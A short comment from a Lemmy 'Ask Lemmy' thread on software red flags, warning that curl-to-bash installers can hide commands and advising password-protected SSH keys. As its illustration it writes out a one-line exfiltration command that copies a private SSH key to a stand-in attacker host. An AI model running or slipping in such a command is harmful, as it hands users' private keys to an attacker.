minus-squareEscape13@slrpnk.nettoAsk Lemmy@lemmy.world•What are some software red flags?linkfedilinkarrow-up3·12 hours agoLet’s say you curl bash something and it has ie ‘scp ~/.ssh/id_ed25519 badComputerGuy’ in it then you just uploaded your private key to the bad guys. And that’s why ssh keys should be password protected linkfedilink
Let’s say you curl bash something and it has ie ‘scp ~/.ssh/id_ed25519 badComputerGuy’ in it then you just uploaded your private key to the bad guys. And that’s why ssh keys should be password protected